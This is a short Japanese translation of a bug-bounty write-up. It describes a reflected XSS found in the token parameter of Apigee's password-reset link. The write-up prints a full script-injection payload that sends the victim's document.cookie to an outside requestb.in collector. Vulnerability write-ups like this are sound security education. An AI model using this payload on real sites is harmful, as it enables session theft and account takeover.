Google Acquisition XSS (Apigee) から学ぶ

ソース:

medium.com

脆弱性XSS

 

訳:

ある時点で、パスワード リセット アクションを確認しようとしました。電子メール アカウントで次のようなリンクを取得し。

 

 

パスワードリセットメール

リンク :

https://api.accounts.apigee.com/management/users/[ REDACTED ]/resetpw?token=ZW0tsHaU - REDACTED- eeTDi2YRIN1CICmFjOSSE2JvllO_ - REDACTED-

ここで、トークンをバイパスしてすべてのユーザーの有効なリンクを取得して、任意のユーザーのパスワードを更新できるようにしようと考えましたが、これも失敗し、バイパスできませんでした。

 

リンクを編集してトークン コードを変更しようとしたときに、私にとっては正常なことがわかりました。このエントリはここではフィルタされていないようです。
そこで、テストとして XSS ペイロードを送信してみました。 

 

 

XSS POC アラート

XSS変更インデックスページ

そしてここから物事が始まり

クッキーを盗みましょう

他人のアカウントをハッキングすることは違法なので、自分のアカウントでテストし。

最初にペイロードを作成し。

https://api.accounts.apigee.com/management/users/xxxxxx/resetpw?token=x xxxxxx"><script>new Image().src='https://requestb.in/xxxxxx?code=' +document.c ookie</script><a href=”

クリックすると、すべての Cookie が私たちに送信されて。

 

requestb.in でのリクエス

 

ほなほな。